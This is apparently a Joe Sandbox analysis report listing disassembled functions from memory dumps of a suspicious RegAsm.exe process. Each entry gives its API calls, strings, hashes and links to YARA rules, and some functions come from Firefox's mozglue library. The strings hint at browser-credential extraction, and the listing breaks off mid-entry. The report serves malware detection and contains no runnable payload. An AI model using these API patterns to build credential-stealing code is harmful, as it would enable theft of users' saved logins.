API String ID: 2745304114-0
Opcode ID: 0b8ea3c3ef1844167fa3520ccda1f0aa0ff527d3c1cbc77041ac1bf1bdcad4e1
Instruction ID: 4a9408fee8acc020598e8b391f0ef7e158d545e24addf0e11692f0270a5b3f0e
Opcode Fuzzy Hash: 0b8ea3c3ef1844167fa3520ccda1f0aa0ff527d3c1cbc77041ac1bf1bdcad4e1
Instruction Fuzzy Hash: 3611E271B003498BDF00EFA5CC889AE7B79FF89354F020169E50697751DB30AD08CBA5

Function 0041210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000000,?,?,?,00413794,00000000,00000010), ref: 00412119
lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
lstrlenA.KERNEL32(?), ref: 00412144
wsprintfA.USER32 ref: 00412156

Strings

%s%s, xrefs: 00412150
C:\Users\user\Desktop\, xrefs: 0041212C, 00412131

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-93594680
Opcode ID: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction ID: 2b65b01ea0560ea7e18c8daf8da5e1637e4a778ce13f385dfd922e5b6f13eae1
Opcode Fuzzy Hash: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction Fuzzy Hash: 83F0E9322002157FDF091F99DC48D9B7FAEDF45666F000061F908D2211C6775F1586E5

Function 6C560180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C560270
GetCurrentThreadId.KERNEL32 ref: 6C5602E9
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C5602F6
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C56033A

Strings

about:blank, xrefs: 6C56020F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: fd40fa36f9d76bf64b35fb0fa81ce07a6dc88e5236db49bf9693437e503d5b3c
Instruction ID: b5429333be9f09a40cbfdbe0b9ee3d03a4177c6399e0314ea01bd05916b28e85
Opcode Fuzzy Hash: fd40fa36f9d76bf64b35fb0fa81ce07a6dc88e5236db49bf9693437e503d5b3c
Instruction Fuzzy Hash: 1851D170A00255CFCB00DF19CC8069AB3F1FF88318F66465AD81AA7B60D731BD46CB95

Function 0040826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00408307
LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C

Strings

v20, xrefs: 00408286
v10, xrefs: 004082CE
ERROR_RUN_EXTRACTOR, xrefs: 004082BE

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 52611349-380572819
Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99

Function 6C55E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C55E084,00000000), ref: 6C55E137

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C55E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C55E1E9

Part of subcall function 6C5599A0: GetCurrentThreadId.KERNEL32 ref: 6C5599C1
Part of subcall function 6C5599A0: AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C5599CE
Part of subcall function 6C5599A0: ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C5599F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C55E13F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: a2b7d6a6ae989f3d52cd0d01486b901e5e00083727b27c95b03dbb89ef74f668
Instruction ID: 9140f9e5b3a321b66197b68a5001f8b202d5928c88e90668938ade0f6be02637
Opcode Fuzzy Hash: a2b7d6a6ae989f3d52cd0d01486b901e5e00083727b27c95b03dbb89ef74f668
Instruction Fuzzy Hash: 6631F6B1605311DBD704DF588C4136AF7E5AFCA308F54852FE8898BB81EB748D09C792

Function 6C54F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C54F480

Part of subcall function 6C51F100: LoadLibraryW.KERNEL32(shell32,?,6C58D020), ref: 6C51F122
Part of subcall function 6C51F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C51F132

CloseHandle.KERNEL32(00000000), ref: 6C54F555

Part of subcall function 6C5214B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C521248,6C521248,?), ref: 6C5214C9
Part of subcall function 6C5214B0: memcpy.VCRUNTIME140(?,6C521248,00000000,?,6C521248,?), ref: 6C5214EF

Part of subcall function 6C51EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C51EEE3

CreateFileW.KERNEL32 ref: 6C54F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C54F523

Strings

\oleacc.dll, xrefs: 6C54F4CB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 6537e9204499c37446330b2078c6c510685ff9945cf7e6bdd69fdd9ccb286a33
Instruction ID: 77f3d26f929ebcb94709ec2162c40cbdadff07077bc9a339476db492e80bd38a
Opcode Fuzzy Hash: 6537e9204499c37446330b2078c6c510685ff9945cf7e6bdd69fdd9ccb286a33
Instruction Fuzzy Hash: 06418C306087509FE720DF69CC84ADBB7F4AF85318F508B1CE59587651EB70E9498B92

Function 6C550210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6C550222
moz_xmalloc.MOZGLUE(0000000C), ref: 6C550231

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C55028B
RtlFreeHeap.NTDLL ref: 6C5502F7

Strings

@, xrefs: 6C5502D8

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 44cf985c067e43b531238e54115ed761bcc68479d16ff4572ef074e1f0ae7545
Instruction ID: a6d7b896d345a40775225e71c7f013121517799e52c2ff05d8fed2bfd8b305a7
Opcode Fuzzy Hash: 44cf985c067e43b531238e54115ed761bcc68479d16ff4572ef074e1f0ae7545
Instruction Fuzzy Hash: 8131ACB1A002518FEB54DF59CC80A1AB7E1EF84318B58892ED95ADBB81D731EC11CB80

Function 0041BFC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,762283C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083

Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,03C12578), ref: 0041B9C5

Strings

'oA, xrefs: 0041BFD6

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 'oA
API String ID: 3986731826-570265369
Opcode ID: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction ID: 1898f3f14c485dfe9e4ef6ed33e1055e23cef853a536fbea19f5c84a704e6684
Opcode Fuzzy Hash: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction Fuzzy Hash: DA416D71800209DFCF14DFA9C880AEEBFF9FF48310F10416AE855EA256E3359985CBA4

Function 6C55E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55E04F

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C55E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C55E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C55E057

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 722cf58b766db24e92d569ae3f35a153f47b6a3620b142997229c7f7b3e76688
Instruction ID: a4eb6b79ba441c059b156dd9d7aedbe472dce1934c98160943fb2a44b8421557
Opcode Fuzzy Hash: 722cf58b766db24e92d569ae3f35a153f47b6a3620b142997229c7f7b3e76688
Instruction Fuzzy Hash: 6021F274B002488FDF04DF64CC58AAEB7B5BF85308F950016E80A97740DB75AD19C7E1

Function 6C5774A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C577526
__Init_thread_footer.LIBCMT ref: 6C577566
__Init_thread_footer.LIBCMT ref: 6C577597

Strings

kernel32.dll, xrefs: 6C577557
UnmapViewOfFile2, xrefs: 6C577552

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: d88ac3508c40d9b134190f41fbd969c934964eea589d2bc0e00f58515c134235
Instruction ID: b755acaff9a2e436c84bdc43a3ac8fd86e65c9dc74c7e20aa7b0fce9a460847e
Opcode Fuzzy Hash: d88ac3508c40d9b134190f41fbd969c934964eea589d2bc0e00f58515c134235
Instruction Fuzzy Hash: 74214C31700581EBCE25CFE5EC04E8D3376FB863A4F1246A9F80247B40D770AC51C6A9

Function 6C577930 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C52BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C577A3F), ref: 6C52BF11
Part of subcall function 6C52BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C577A3F), ref: 6C52BF5D
Part of subcall function 6C52BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C577A3F), ref: 6C52BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C577968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C57A264,6C57A264), ref: 6C57799A

Part of subcall function 6C529830: free.MOZGLUE(?,?,?,6C577ABE), ref: 6C52985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C5779E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C5779E8

Strings

Xl, xrefs: 6C5779D0

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: Xl
API String ID: 3421697164-2719694139
Opcode ID: 0db4ca29db7d89037c6cde0a8849250cefc28d17fa8b812f000df9e30e4dcf5a
Instruction ID: f93bb4b13ff0a85cf050cacf8d4660be794838874fe2ec49743081eb52de9963
Opcode Fuzzy Hash: 0db4ca29db7d89037c6cde0a8849250cefc28d17fa8b812f000df9e30e4dcf5a
Instruction Fuzzy Hash: 64217A356043049BCB14EF18DC85A9EBBF5FFC9310F05886DE84A873A5CB30A909CB92

Function 6C577A10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C52BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C577A3F), ref: 6C52BF11
Part of subcall function 6C52BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C577A3F), ref: 6C52BF5D
Part of subcall function 6C52BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C577A3F), ref: 6C52BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C577A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C577A7A

Part of subcall function 6C529830: free.MOZGLUE(?,?,?,6C577ABE), ref: 6C52985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C577AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C577AC8

Strings

Xl, xrefs: 6C577AB0

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID: Xl
API String ID: 3421697164-2719694139
Opcode ID: c328b052849d8e92aeec27324247a8477deef623655f87d7bb2cee07200f2789
Instruction ID: a673ad3f2cbec33b3cb114001a28ff028196fd4d10a8f6818d4ec67032f55ded
Opcode Fuzzy Hash: c328b052849d8e92aeec27324247a8477deef623655f87d7bb2cee07200f2789
Instruction Fuzzy Hash: 892169356043049BCB14EF18DC85A9EBBE5FFC9310F01886CE84A873A5CB30A909CB92

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

string too long, xrefs: 0040F2E1
invalid string position, xrefs: 0040F2C2

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction ID: 57eaf4f8ed72a9c9f24929b0a4870ba8c902719b5e729f6aa90dd4ccac796c9b
Opcode Fuzzy Hash: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction Fuzzy Hash: 6611E0713002029FCB24DF6DD881A59B3A5BF45324754053AF816EBAC2C7B8ED498799

Function 6C57A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59F770,-00000001,?,6C58E330,?,6C53BDF7), ref: 6C57A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C53BDF7), ref: 6C57A7C2
moz_xmalloc.MOZGLUE(00000018,?,6C53BDF7), ref: 6C57A7E4
LeaveCriticalSection.KERNEL32(6C59F770), ref: 6C57A80A

Strings

accelerator.dll, xrefs: 6C57A7BF

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 810fa2131d7d0d63ed147a8aed52f8d7443ea23f6258de681c5d64092aaa7cf8
Instruction ID: b314f544bfe1c676b02d34a0c834186f52a064263f7bee58186f12c36cae8f73
